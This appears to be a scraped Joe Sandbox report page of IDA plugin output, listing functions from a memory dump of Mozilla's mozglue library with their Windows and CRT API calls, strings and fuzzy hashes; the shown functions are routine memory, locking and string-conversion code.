Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: adf7f41199faf831aac0bb61bdee2245ba6de12fc04380c60b393a02d71f7dbd
Instruction ID: 5c6c12561ad4fed68c830436edc17d2dc010666d754a5b8311d5b6b254646228
Opcode Fuzzy Hash: adf7f41199faf831aac0bb61bdee2245ba6de12fc04380c60b393a02d71f7dbd
Instruction Fuzzy Hash: D241C1B5B007068FEB14CFA8E88876A73F5BB4538CF144629D566EB740E731E944CB51

Function 6C9BCFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9BCFF6
LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9BD026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C9BD06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C9BD139

Strings

MOZ_CRASH(), xrefs: 6C9BD187

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: c19e4c3fc883f561c6f572b1063d0cbf1a56461bb0b9e7b93365144f71e6a34d
Instruction ID: 7e2836fa5a2687504a2f5fe5781998886324340454a101bc874bd810c2bb1d34
Opcode Fuzzy Hash: c19e4c3fc883f561c6f572b1063d0cbf1a56461bb0b9e7b93365144f71e6a34d
Instruction Fuzzy Hash: 4E41C332B017169FCB28CE6C8CA836A36B5EB4A714F144139E91CE7788D7B19C028BD0

Function 6C9B4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9B4E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C9B4E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9B4EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9B4F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C9B4F1E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: b67fd1a79debd03845ade3963d2b7f9f42f4f8da841abe7aa80fb5c560c046fe
Instruction ID: d9104f7fe088939f46d91eea6d5d6ef1b03014543aba6a9f74f70b05d0c98aa3
Opcode Fuzzy Hash: b67fd1a79debd03845ade3963d2b7f9f42f4f8da841abe7aa80fb5c560c046fe
Instruction Fuzzy Hash: 0741BF71608701AFC705CF69C88095BB7E8FF99344F108A2DF866A7741DB30E958DB92

Function 6CA1A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3F770), ref: 6CA1A858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA1A87B

Part of subcall function 6CA1A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6CA1A88F,00000000), ref: 6CA1A9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6CA1A8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA1A90C
LeaveCriticalSection.KERNEL32(6CA3F770), ref: 6CA1A97E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
String ID:
API String ID: 1355178011-0
Opcode ID: 34c58a742afaa0a38fd6e330b790bf620ef3505851e66b0937ae3a4f27e83632
Instruction ID: 3f60e3cbbaa156865728f862538364a9410811cf422b2fc30419d2632041e3f1
Opcode Fuzzy Hash: 34c58a742afaa0a38fd6e330b790bf620ef3505851e66b0937ae3a4f27e83632
Instruction Fuzzy Hash: 214180B0E002488FDB00DFE8D845ADEBB71FF04324F148629E81AAB791D735D989CB91

Function 6C9C1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C15BC
moz_xmalloc.MOZGLUE(-00000001,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C15E7
free.MOZGLUE(?,?,?,?,?,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C1606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C1637

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: c496368404a05f0a37fa6adf70506568a7c91a5f3a27e73830476c084281c6da
Instruction ID: 9042fdf8974ffb4e429840cf4a52ffa74f46c3efa2caf69366a215920d86bb72
Opcode Fuzzy Hash: c496368404a05f0a37fa6adf70506568a7c91a5f3a27e73830476c084281c6da
Instruction Fuzzy Hash: 49310572B001158BCB188E78D95047E77A9FB923747280B2DE823DBBD4EB30D9158797

Function 6CA1AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AD9D

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1ADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AE01
GetLastError.KERNEL32(?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AE3D

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: b056cc1ed8aebbeb56e98d50ba8ea1f6195af24211d90bbcd5fc73e22cba4897
Instruction ID: 0dcaceae143a5ecaf15d6e10056e238f65c22c2c09d0f261cfbeab088b9623cf
Opcode Fuzzy Hash: b056cc1ed8aebbeb56e98d50ba8ea1f6195af24211d90bbcd5fc73e22cba4897
Instruction Fuzzy Hash: 5A3182B1A003259FDB10DF798D44AABBBF9EF49614F158429E84AD7740E734DC48CBA0

Function 6CA15EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CA2DCA0,?,?,?,6C9EE8B5,00000000), ref: 6CA15F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C9EE8B5,00000000), ref: 6CA15F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C9EE8B5,00000000), ref: 6CA15F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C9EE8B5,00000000), ref: 6CA15F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C9EE8B5,00000000), ref: 6CA15FD6

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 91611166587d7ba9468c7528af4bef97a3755c26463b7b971f3deb01fc30db42
Instruction ID: ed6604d64c4b6b41b5d9de1d0c9a8b1df06753534a32f40ac17af177944788a8
Opcode Fuzzy Hash: 91611166587d7ba9468c7528af4bef97a3755c26463b7b971f3deb01fc30db42
Instruction Fuzzy Hash: 31310F34304A018FD725CF29D898E2AB7F6FF89359B688558F55A87B95C731EC42CB80

Function 6C9BB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C9BB532
moz_xmalloc.MOZGLUE(?), ref: 6C9BB55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9BB56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C9BB57E
free.MOZGLUE(00000000), ref: 6C9BB58F

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 548a0f267f0a0eb919152c81fa0326385f37a403d578a16563fdf17be214ae0d
Instruction ID: 1af5e8f575965d0fcb589f393f6a76ef835b9885ad5c18fafa3cdd11f8ac577f
Opcode Fuzzy Hash: 548a0f267f0a0eb919152c81fa0326385f37a403d578a16563fdf17be214ae0d
Instruction Fuzzy Hash: 40210A71600205ABDB009F68CD80B6FBBB9FF41308F28412DE918EB381E775D911C7A1

Function 6C9BB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C9BB7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C9BB808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C9BB82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9BB840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9BB849

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: bda6d987e188ea44a44710cd9d5ec954d304665336f49ca3dc68fcd81403902d
Instruction ID: 112567f48f51a950f37b2fd90ce5daded0ebad41fbba8db2d89d3a1490b633c9
Opcode Fuzzy Hash: bda6d987e188ea44a44710cd9d5ec954d304665336f49ca3dc68fcd81403902d
Instruction Fuzzy Hash: 0B214DB5E002199FDF04DFA9C8855BFBBB4EF49718F148169EC0AA7341E735A944CBA0

Function 6CA16E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CA16E78

Part of subcall function 6CA16A10: InitializeCriticalSection.KERNEL32(6CA3F618), ref: 6CA16A68
Part of subcall function 6CA16A10: GetCurrentProcess.KERNEL32 ref: 6CA16A7D
Part of subcall function 6CA16A10: GetCurrentProcess.KERNEL32 ref: 6CA16AA1
Part of subcall function 6CA16A10: EnterCriticalSection.KERNEL32(6CA3F618), ref: 6CA16AAE
Part of subcall function 6CA16A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CA16AE1
Part of subcall function 6CA16A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CA16B15
Part of subcall function 6CA16A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CA16B65
Part of subcall function 6CA16A10: LeaveCriticalSection.KERNEL32(6CA3F618,?,?), ref: 6CA16B83

MozFormatCodeAddress.MOZGLUE ref: 6CA16EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CA16EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CA16EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CA16EFF

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: eaae8f38b5f2999a888beb8dc8d8dc82ddcd4a6367e066ac9a487086fee36d4f
Instruction ID: 2bcb6020a438593049eeb6e88593ea8f78a4908bee2aef3b301d63d6b8945c4b
Opcode Fuzzy Hash: eaae8f38b5f2999a888beb8dc8d8dc82ddcd4a6367e066ac9a487086fee36d4f
Instruction Fuzzy Hash: D921A171A0831A8BCB14CF29DC8569A77F5EF88308F048139E80DD7340DB309A498F92

Function 6CA176C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6CA176F2
moz_xmalloc.MOZGLUE(00000001), ref: 6CA17705

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA17717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CA1778F,00000000,00000000,00000000,00000000), ref: 6CA17731
free.MOZGLUE(00000000), ref: 6CA17760

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: 5549ce61e280e557033f0092741c552f0b76fee2569ecdf105df437a4a3b64d1
Instruction ID: 1b1f09ae927dd21d1620f2117215ca31f613463fab499accc14eee406c5c3968
Opcode Fuzzy Hash: 5549ce61e280e557033f0092741c552f0b76fee2569ecdf105df437a4a3b64d1
Instruction Fuzzy Hash: BE11C4B1904325ABE710AF76DC44BABBEE8EF55354F049529F848E7700E7709844CBE2

Function 6C9F0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C9B3DEF), ref: 6C9F0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C9B3DEF), ref: 6C9F0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C9B3DEF), ref: 6C9F0DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C9F0D97, 6C9F0DBE
<jemalloc>, xrefs: 6C9F0D92, 6C9F0DB9

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 6231797b6ee7fce6b30bcd761934cc1b61829c04fe40735e3977a8cef28dec20
Instruction ID: fc073f7c0a7a4268c2e38e971dcc367218929c8a4fcb9c610b25ed8c91dc9423
Opcode Fuzzy Hash: 6231797b6ee7fce6b30bcd761934cc1b61829c04fe40735e3977a8cef28dec20
Instruction Fuzzy Hash: 0DF02E313907A923E734116A1C1AF6A265F67C2B25F30B175F76CDE9C0DA90E44747B8

Function 6CA07620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CA075C4,?), ref: 6CA0762B

Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CA074D7,6CA115FC,?,?,?), ref: 6CA07644
GetCurrentThreadId.KERNEL32 ref: 6CA0765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CA074D7,6CA115FC,?,?,?), ref: 6CA07663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CA074D7,6CA115FC,?,?,?), ref: 6CA07677

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 7877b923b2f4a739f6800473b8320c5ca9a8e4a5848f826b7b46b2c86543eeee
Instruction ID: e6d5c03e43f1583daf31fc7473a1f74dd54196d6b7e386f32b46a61d6f84ebc5
Opcode Fuzzy Hash: 7877b923b2f4a739f6800473b8320c5ca9a8e4a5848f826b7b46b2c86543eeee
Instruction Fuzzy Hash: D6F0C271E10B46ABD7008F22DC98676B779FFEA259F218316F90883601E7B0A5D18BD1

Function 6CA11700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6CA11800

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

Part of subcall function 6C9B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3EBD,6C9F3EBD,00000000), ref: 6C9B42A9

Strings

{marker.name} - {marker.data.name}, xrefs: 6CA118C7
name, xrefs: 6CA11939
Details, xrefs: 6CA11925

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 90d73a3c6efe7ba00aa64cc39603c8fcf34608db7f2da7e27c98358cb417e632
Instruction ID: cbc56638dbae157e2e7fd647aca32d7071c39e27497940f92b253f348083ccac
Opcode Fuzzy Hash: 90d73a3c6efe7ba00aa64cc39603c8fcf34608db7f2da7e27c98358cb417e632
Instruction Fuzzy Hash: 667136B0A007469FCB04DF28D8547AABBB1FF69304F04466DD8199BB41D730EA99CBE1

Function 6CA1B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6CA1B0A6,6CA1B0A6,?,6CA1AF67,?,00000010,?,6CA1AF67,?,00000010,00000000,?,?,6CA1AB1F), ref: 6CA1B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6CA1B0A6,6CA1B0A6,?,6CA1AF67,?,00000010,?,6CA1AF67,?,00000010,00000000,?), ref: 6CA1B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6CA1B0A6,6CA1B0A6,?,6CA1AF67,?,00000010,?,6CA1AF67,?,00000010), ref: 6CA1B25F

Strings

map/set<T> too long, xrefs: 6CA1B1FA

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: e80de90d1345ef51423b8c7b5405cadf871d02b060e583a6b654ce2f3d7b1534
Instruction ID: 19ee55be735cdb6b6735ce50c445c7abaa5e63e896261304292f10bf872090a0
Opcode Fuzzy Hash: e80de90d1345ef51423b8c7b5405cadf871d02b060e583a6b654ce2f3d7b1534
Instruction Fuzzy Hash: 95619DB46082458FD701CF19D980A9ABBF1FF4A328F19C299D8599FB52C331EC85CB91

Function 6C9DD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

EnterCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD4F2
LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD50B

Part of subcall function 6C9BCFE0: EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9BCFF6
Part of subcall function 6C9BCFE0: LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9BD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD52E
EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9DD690
LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD751

Strings

MOZ_CRASH(), xrefs: 6C9DD4BB

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
